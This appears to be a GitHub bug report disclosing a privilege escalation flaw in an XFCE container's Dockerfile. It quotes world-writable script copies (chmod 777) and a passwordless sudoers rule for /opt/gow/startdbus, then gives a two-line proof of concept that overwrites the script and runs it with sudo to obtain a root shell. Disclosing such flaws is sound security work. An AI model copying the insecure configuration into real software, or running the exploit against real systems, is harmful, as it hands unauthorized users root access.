[Bug] Privilege Escalation in the XFCE container #279
Description
Due to these lines in the XFCE Container's dockerfile:
COPY --chmod=777 scripts/launch-comp.sh scripts/startup.sh /opt/gow/
COPY --chmod=777 scripts/startdbus.sh /opt/gow/startdbus
any unprivileged user can escalate to root by simply writing to the startdbus script which is passwordless when using sudo as we can see in :
# Allow anyone to start dbus without password
RUN echo "\nALL ALL=NOPASSWD: /opt/gow/startdbus" >> /etc/sudoers
This can be problematic if any unauthorized user got access and potentially compromise the system.
POC (simplest POC i've ever written tbh 😭 )
echo "bash" > /opt/gow/startdbus
sudo /opt/gow/startdbus